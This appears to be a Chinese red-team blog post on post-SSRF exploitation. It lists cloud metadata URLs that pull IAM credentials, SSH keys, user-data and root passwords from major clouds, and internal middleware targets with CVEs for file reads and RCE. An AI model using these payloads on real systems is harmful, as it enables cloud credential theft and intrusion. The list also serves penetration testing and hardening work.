前言

SSRF漏洞在互联网公司中应该是除了越权之外最普遍的漏洞了。关于漏洞的原理，绕过，传统的扫端口、各种探测等利用方式等就不再赘述，这里分享下自己作为攻防当中常用的一些SSRF的利用途径。

0x01 Cloud Metadata

就是各种云上的元数据信息，有些可直接拿到主机权限，有些可获取一些敏感信息。

1.1 AWS

	# http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
	http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
	# ECS Task : https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint-v2.html
	http://169.254.170.2/v2/credentials/

1.2 Google Cloud

	# https://cloud.google.com/compute/docs/metadata
	# - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" on API v1
	http://169.254.169.254/computeMetadata/v1/
	http://metadata.google.internal/computeMetadata/v1/
	http://metadata/computeMetadata/v1/
	http://metadata.google.internal/computeMetadata/v1/instance/hostname
	http://metadata.google.internal/computeMetadata/v1/instance/id
	http://metadata.google.internal/computeMetadata/v1/project/project-id
	# kube-env; thanks to JackMc for the heads up on this (https://hackerone.com/reports/341876)
	http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env
	# Google allows recursive pulls
	http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
	# returns root password for Google
	http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json

1.3 Digital Ocean

	# https://developers.digitalocean.com/documentation/metadata/
	http://169.254.169.254/metadata/v1.json
	http://169.254.169.254/metadata/v1/
	http://169.254.169.254/metadata/v1/id
	http://169.254.169.254/metadata/v1/user-data
	http://169.254.169.254/metadata/v1/hostname
	http://169.254.169.254/metadata/v1/region
	http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address

1.4 Packetcloud

https://metadata.packet.net/userdata

1.5 Azure

	# https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
	# Header: "Metadata: true"
	# (Old) https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
	http://169.254.169.254/metadata/instance?api-version=2017-04-02
	http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text

1.6 Oracle Cloud

	# https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htm
	http://169.254.169.254/opc/v1/instance/
	# https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.html
	http://192.0.0.192/latest/
	http://192.0.0.192/latest/user-data/
	http://192.0.0.192/latest/meta-data/
	http://192.0.0.192/latest/attributes/

1.7 阿里云

	# https://www.alibabacloud.com/help/faq-detail/49122.htm
	http://100.100.100.200/latest/meta-data/
	http://100.100.100.200/latest/meta-data/instance-id
	http://100.100.100.200/latest/meta-data/image-id

1.8 OpenStack

	# https://docs.openstack.org/nova/latest/user/metadata-service.html
	http://169.254.169.254/openstack
	http://169.254.169.254/openstack/2012-08-10/meta_data.json
	http://169.254.169.254/openstack/2018-08-27/network_data.json

1.9 Kubernetes

	# Debug Services (https://kubernetes.io/docs/tasks/debug-application-cluster/debug-service/)
	https://kubernetes.default.svc.cluster.local
	https://kubernetes.default
	# https://twitter.com/Random_Robbie/status/1072242182306832384
	https://kubernetes.default.svc/metrics

1.10 腾讯云

	# https://cloud.tencent.com/document/product/213/4934
	http://metadata.tencentyun.com/latest/meta-data/
	http://169.254.0.23/latest/meta-data/
	http://100.88.222.5/

1.11 IPv6 Tests

大部分云主机都是支持IPv6的，所以绕过的时候可以尝试下

	http://[::ffff:169.254.169.254]
	http://[0:0:0:0:0:ffff:169.254.169.254]

1.12 华为云

	# https://support.huaweicloud.com/usermanual-ecs/ecs_03_0166.html
	http://169.254.169.254/openstack/latest/meta_data.json
	http://169.254.169.254/openstack/latest/user_data
	http://169.254.169.254/openstack/latest/network_data.json
	http://169.254.169.254/openstack/latest/securitykey

0x02 中间件

利用SSRF攻击传统的组件、CMS等的常用途径不再赘述，这里举一些在大部分互联网公司中常用的 能够被SSRF进一步利用的中间件。

2.1 Apollo

利用点：

• 未授权访问
  • 伪造客户端访问服务端，容易泄漏配置信息 · Issue #2099 · apolloconfig/apollo · GitHub 直接获取各种配置信息，各种账密、AK、数据库等

2.2 Erueka

利用点：

• 未授权访问
  • Erueka未授权访问漏洞。通过内网Eruaka未授权，可获取到大量注册的应用，若运气好，直接可定位到核心组件和核心服务。

2.3 JumpServer

利用点：

• RCE：
  • JumpServer远程代码执行漏洞。JumpServer的这个漏洞最开始基本上都是在Nginx层做的拦截，如果直接找到Jumpserver的后端端口，可直接尝试利用漏洞RCE。

2.4 Grafana

利用点：

• 文件读取
  • CVE-2021-43798任意文件读取。内网的组件大多比较脆弱，直接读Grafana的DB文件，得到的基本上都是比较重要的DB账号密码。

2.5 K8s

利用点：

• 各种未授权访问
  • 这个比较大，不一一说了，纯属看运气了。比如常见的：API Server / etcd / kubectl proxy / kubelet / Docker Remote API / dashboard等等等

2.6 大数据相关

利用点：

• 未授权访问
• 文件读取
• RCE

大数据生态组件也非常多，大多利用未授权访问、文件读取漏洞进行信息获取，部分可进行RCE。

2.7 SpringBoot Actuator

利用点：

• 未授权访问：

  • 很多Actuator的端点拦截只是对外网而言，有些是在Nginx过滤了 或者在 filter设置的只允许内部网络访问，通过SSRF就可以直接未授权获取各种数据，直接下载heapdump获取数据。

• 文件读取：

  • Logview CVE-2021-21234

• RCE：

  • Gateway SPEL 代码注入 (CVE-2022-22947)
  • 修改env端点属性
    • eureka xstream deserialization
    • SnakeYAML RCE
    • Jolokia Realm JNDI RCE
    • H2 RCE

2.8 内网业务应用

这里有个小技巧，先搞应用的API文档，大部分内网调用的服务很多都不做权限校验的，直接请求接口运气好的直接搞到核心数据

API文档的Fuzz URI

	doc.html
	swagger-ui.html
	swagger/swagger-ui.html
	api/swagger-ui.html
	api/doc.html
	swagger/index.html
	druid/index.html
	spring-security-rest/api/swagger-ui.html
	spring-security-oauth-resource/swagger-ui.html
	swagger/v1/swagger.json
	swagger/v2/swagger.json
	api-docs
	v1/api-docs
	v2/api-docs
	...

2.9 Confluence

利用点：

• SPEL RCE
  • CVE-2021-26084 Remote Code Execution on Confluence Servers

2.10 Elasticsearch

利用点：

• 未授权访问：

  • 运气好的直接搞到运维或中间件的ES
    • 是应用ES的话找访问日志的索引和操作日志的索引
    • 是运维ES的话找应用stdout/stderr/logback等的索引

• RCE：

  • log4j（我不会告诉你 国内TOP3云厂商卖的ES服务还有log4j漏洞呢）

2.11 阿里Druid

利用点：

• 未授权访问
  • 找URI
  • 找Session
  • 找SQL（往SQL注入靠）

2.12 Apache Druid

利用点：

• 未授权访问
  • Dashboard
• 文件读取
  • CVE-2021-36749 Apache Druid LoadData 任意文件读取
• RCE
  • Apache Druid 远程代码执行漏洞（CVE-2021-26919）
  • 结合未授权 Apache Druid 命令执行漏洞（CVE-2021-25646）

2.13 APISIX

利用点：

• 未授权访问
  • CVE-2021-45232 APISIX Dashboard未授权访问漏洞

2.14 Jenkins

利用点：

• 未授权访问
  • Groovy 脚本控制台 RCE
• RCE
  • CVE-2018-1000861
  • CVE-2019-1003000
• 参考:瓦都尅'Blog